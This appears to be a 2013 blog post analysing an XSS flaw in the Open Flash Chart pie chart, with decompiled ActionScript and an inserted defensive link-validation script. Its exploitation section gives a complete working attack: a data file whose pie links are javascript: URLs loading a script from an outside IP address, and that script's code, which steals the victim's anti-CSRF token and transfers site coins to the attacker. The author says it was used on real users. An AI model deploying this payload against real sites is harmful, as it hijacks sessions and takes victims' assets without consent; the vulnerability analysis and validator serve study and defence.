2013/07/30 21:56

Background
See here first: zone.wooyun.org/content/499…

Let's dig into the details of the bug. Decompile the Flash code at www.showmycode.com/.

The configuration (data) file is passed in through the data argument. Searching for _root.data finds the following code:

var lv = new LoadVars();
lv.onLoad = LoadVarsOnLoad;
lv.make_chart = make_chart;
lv.make_pie = make_pie;
if (_root.data == undefined) {
    if (_root.variables == undefined) {
        _root.data = "C:\\Users\\John\\Documents\\flash\\svn\\data-files\\data-47.txt";
        lv.load(_root.data);
    } else {
        _root.LoadVarsOnLoad = LoadVarsOnLoad;
        _root.LoadVarsOnLoad(true);
    }
} else {
    lv.load(_root.data);
}

LoadVars loads the data file, whose fields are separated by ampersands, and then calls the LoadVarsOnLoad callback. Following it in, the code is:

function LoadVarsOnLoad(success) {
    if (!success) {
        _root.loading.done();
        _root.oops(_root.data);
        return(undefined);
    }
    if (_root.oops != undefined) {
        removeMovieClip("oops");
    }
    for (i in _root) {
        if (typeof(_root[i]) == "movieclip") {
            removeMovieClip(_root[i]);
        }
        delete i;
    }
    _root.css = new Css("margin-top: 30; margin-right: 40;");
    NumberFormat.getInstance(this);
    NumberFormat.getInstanceY2(this);
    _root._background = new Background(this);
    if (this.pie != undefined) {
        this.make_pie();
    } else {
        this.make_chart();
    }
    if (this.tool_tip != undefined) {
        _root.tool_tip_wrapper = this.tool_tip.replace("#comma#", ",");
    }
    _root.loading.done();
    _root.move();
}

Note the following: this.make_pie() is called whenever the external data contains a pie field.

if (this.pie != undefined) {
    this.make_pie();
}

Searching for the make_pie function shows the following code, which calls new PieStyle(this, "pie"):

function make_pie() {
    _root._pie = new PieStyle(this, "pie");
    _root._title = new Title(this);
}

Moving on, the constructor of this class starts with links = lv.links.split(","): lv.links comes straight from the external data file, is split into the links array, and finally set_values(_local6) is called. Looking at the set_values function:

function set_values(v) {
    super.set_values(v);
    pie_mcs = new Array(values.length);
    var _local4 = 0;
    while (_local4 < values.length) {
        var _local5 = _root.createEmptyMovieClip((name + "_") + _local4, _root.getNextHighestDepth());
        _local5.onRollOver = function () {
            ChartUtil.FadeIn(this, true);
        };
        _local5.onRollOut = function () {
            ChartUtil.FadeOut(this);
        };
        if (links.length > _local4) {
            _local5._ofc_link = links[_local4];
            _local5.onRelease = function () {
                trace(this._ofc_link);
                getURL(this._ofc_link);
            };
        }
        var _local6 = {x_label:labels[_local4], value:values[_local4], key:"??"};
        _local5.tooltip = _local6;
        pie_mcs[_local4] = _local5;
        _local4++;
    }
    valPos();
}

This function is the key: it iterates over links and passes each entry, unchecked, to getURL, and a javascript: URL handed to getURL runs as JavaScript in the page that embeds the SWF.
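As an added example (not from the original post and not Open Flash Chart's own code), this is the check a server that publishes these data files would want: parse the LoadVars-style "&key=value&" format the SWF loads, split the links field the way PieStyle does, and reject any entry whose scheme is not http or https before it can ever reach getURL. The sample data and the placeholder base host chart.invalid are constructed for the example.

```javascript
// Added example (not from the original post or from Open Flash Chart): a server-side
// check for the data file the SWF loads. LoadVars splits it into "&key=value&" pairs,
// PieStyle splits "links" on commas and hands every entry to getURL(), so entries
// whose scheme is not http(s) must be rejected before the file is served.
const SAFE_SCHEMES = new Set(["http:", "https:"]);

// Parse LoadVars-style data: '&'-separated "key=value" fields, values URL-decoded
// as LoadVars does. Empty fields (from "&&" or line breaks) are skipped.
function parseLoadVars(data) {
  const fields = {};
  for (const pair of data.split("&")) {
    if (pair.trim() === "") continue;
    const eq = pair.indexOf("="); // split on the first '=' only; values may contain '='
    const key = (eq === -1 ? pair : pair.slice(0, eq)).trim();
    const raw = eq === -1 ? "" : pair.slice(eq + 1);
    let value;
    try { value = decodeURIComponent(raw.replace(/\+/g, " ")); } catch (e) { value = raw; }
    fields[key] = value;
  }
  return fields;
}

// Is one links entry safe to hand to getURL()? Resolving against a placeholder base
// (chart.invalid) lets relative paths through as https; the URL parser lowercases the
// scheme and strips leading whitespace, tabs and newlines, so "JavaScript:",
// " javascript:" and "java\tscript:" all come out as javascript: and are rejected.
function isSafeLink(link) {
  let parsed;
  try {
    parsed = new URL(link, "https://chart.invalid/");
  } catch (e) {
    return false; // unparseable: reject rather than guess
  }
  return SAFE_SCHEMES.has(parsed.protocol);
}

// Every links entry in a data file that must not reach getURL(); empty means safe.
function findUnsafeLinks(data) {
  const fields = parseLoadVars(data);
  if (!("links" in fields)) return [];
  return fields.links.split(",").filter((l) => l !== "" && !isSafeLink(l));
}

// Constructed sample modelled on the post's data file: two safe entries, one
// mixed-case javascript: entry and one with an encoded tab inside the scheme.
const SAMPLE_DATA = "&title=Chart,{font-size:18px; color:#d01f3c}&\n&values=50,50&\n" +
  "&links=/detail?id=1,JavaScript:alert(1),https://example.test/a,java%09script:alert(1)&";

console.log(findUnsafeLinks(SAMPLE_DATA)); // [ 'JavaScript:alert(1)', 'java\tscript:alert(1)' ]
```

The same check belongs on whatever endpoint accepts user-supplied data URLs for the chart, since the SWF itself performs none.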

Exploitation
With XSS in hand, the anti-CSRF token can be read straight out of the page, so actions on Wooyun can be performed on the victim's behalf. Let's look at how the remote data file is constructed:

&title=Tencent high-risk vulnerability list (click a category to view details),{font-size:18px; color:#d01f3c}&
&x_axis_steps=1&
&y_ticks=2,#E4F0DB=0&
&y_min=0&
&y_max=20&
&pie=60,#E4F0DB,{display:none;},1,,1&
&values=50,50&
&pie_labels=Remote command execution,Tencent client overflow&
&colours=#d01f3c,#356aa0&
&links=javascript:window.s=document.createElement('script');window.s.src='http://42.96.150.181/data.js';document.body.appendChild(window.s);,javascript:window.s=document.createElement('script');window.s.src='http://42.96.150.181/data.js';document.body.appendChild(window.s);&
&tool_tip=Category%3A+%23x_label%23%3Cbr%3EProportion%3A+%23val%23%25&

With an eye-catching title, "Tencent high-risk vulnerability list (click a category to view details)", viewers are tempted to click the pie, and each slice in the middle is linked to:

javascript:window.s=document.createElement('script');window.s.src='http://42.96.150.181/data.js';document.body.appendChild(window.s);

This loads our JS file.

The code of the JS file is as follows:

/*
 * ajax
 */
ajax = function(url, params, callback) {
    (params instanceof Function) && (callback = params, params = void(0));
    var XHR = (window.XDomainRequest) || window.XMLHttpRequest || (function() {
        return new ActiveXObject('MSXML2.XMLHTTP');
    });
    var xhr = new XHR();
    xhr.open(params ? 'post' : 'get', url);
    xhr.withCredentials = true;
    try {
        params && xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded');
    } catch (e) {}
    callback && (xhr.onreadystatechange = function() {
        (this.readyState == 4 && ((this.status >= 200 && this.status <= 300) || this.status == 304)) && callback.apply(this, arguments);
    });
    xhr.send(params);
};

ajax("http://www.wooyun.org/user.php?action=update", function() {
    var token = this.responseText.match(/token" value=\"(.+?)\"/)[1];
    ajax("http://www.wooyun.org/user.php?action=coin&do=action_submit", "token=" + token + "&to_whitehat=xsser&to_coin=1");
});

Using the Ajax helper from Sogili's xss.js, it first fetches the current user's token and then performs the coin transfer.

Result
For how this played out on Wooyun, see here: zone.wooyun.org/content/554…

Follow-up
In fact, I did not expect so many people to get caught up in this; it was originally just for fun, but it seems a lot of people got quite worked up, so first of all I offer you my apology.